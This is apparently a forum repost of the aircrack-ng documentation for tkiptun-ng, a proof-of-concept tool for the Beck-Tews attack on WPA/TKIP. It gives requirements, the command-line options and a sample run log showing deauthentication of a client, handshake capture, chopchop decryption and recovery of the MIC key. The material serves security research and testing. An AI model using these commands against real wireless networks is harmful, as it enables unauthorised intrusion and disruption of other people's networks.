|
|
Description
-----------------------
NOTE: This documention is still under development. Please check back on a regular basis to obtain the latest updates. If you have any feedback on the documentation, please post your comments to the Forum.
IMPORTANT NOTE: The tkiptun-ng SVN version is not fully working. The final attack phase is not yet implemented. The other portions are working with the ieee80***11 drivers for RT73 and RTL8187L chipsets. The madwifi-ng driver is definitely broken and is known to completely fail. tkiptun-ng may work with other drivers but has not been tested so your mileage may vary.
Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS. He worked with Erik Tews (who created PTW attack) for a conference in PacSec 2008: “Gone in 900 Seconds, Some Crypto Issues with WPA”.
Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. This attack is described in the paper, Practical attacks against WEP and WPA written by Martin Beck and Erik Tews. The paper describes advanced attacks on WEP and the first practical attack on WPA. An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article Battered, but not broken: understanding the WPA crack by Glenn Fleishman.
Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). This is done via chopchop-type method. Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.
At this point, tkiptun-ng has recovered the MIC key and knows a keystram for access point to client communication. Subsequently, using the XOR file, you can create new packets and inject them. The creation and injection are done using the other aircrack-ng suite tools.
Please remember this is an extremely advanced attack. You require advanced linux and aircrack-ng skills to use this tool. DO NOT EXPECT support unless you can demonstrate you have these skills. Novices will NOT BE SUPPORTED.
General Requirements
-----------------------
Both the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
The AP must be configured for WPA plus TKIP.
A fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes.
Specific Requirements
-----------------------
The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.
Why?
-----------------------
This section is very preliminary. As tkiptun-ng works, it goes through various phases. People ask “Why is such and such done?”. This section attempts to answer those questions.
Question:
Why is the handshake gathered?
Answer:
It is done for debugging reasons. First, so that the temporal keys in tkiptun can be calculated. Second, check them against the calculated values from the plaintext packet.
Another reason, is to check if the AP/client reuses the nonces after a mic shutdown.
Usage
-----------------------
-----------------------
Usage: tkiptun-ng <options> <replay interface>
Filter options:
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-F : choose first matching packet
-e essid : set target AP SSID
Debug options:
-K prga : keystream for continuation
-y file : keystream-file for continuation
-j : inject FromDS packets
-P pmk : pmk for verification/vuln testing
-p psk : psk to calculate pmk with essid
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
--help : Displays this usage screen
Usage Examples
-----------------------
-----------------------
The example below is incomplete but it gives some idea of how it looks.
Input:
-----------------------
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0
Output:
-----------------------
The interface MAC (00:0E:2E:C5:813) doesn't match the specified MAC (-h).
ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
15:06:48 Michael Test: Successful
15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
15:06:48 Found specified AP
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
15:06:56 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0305-15***05.cap
15:07:05 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0305-15***05.cap
15:07:05 Got the answer!
15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84***68ms
15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52***89ms
15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 10***07ms
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 15***19ms
15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17***21ms
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33***25ms
15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10***66ms
15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91***29ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 39***39ms
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 15***20ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 29***00ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 49***61ms
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 18***03ms
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38***37ms
15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 11***20ms
15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 18***01ms
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61***99ms
15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 11***19ms
15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15***84ms
15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 14***21ms
15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 12***64ms
15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68***72ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 26***74ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 29***86ms
15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50***21ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 22***81ms
15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 20***78ms
15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 15***59ms
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 34***00ms
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 19***80ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66
Saving plaintext in replay_dec-0305-15***11.cap
Saving keystream in replay_dec-0305-15***11.xor
15:54:11
Completed in 2816s (0.02 bytes/s)
15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
15:54:11 Sent encrypted tkip ARP request to the client.
15:54:11 Wait for the mic countermeasure timeout of 60 seconds.
Usage Tips
-----------------------
None at this time.
Usage Troubleshooting
-----------------------
None at this time. |
|
发表于 2009-9-24 17:27:13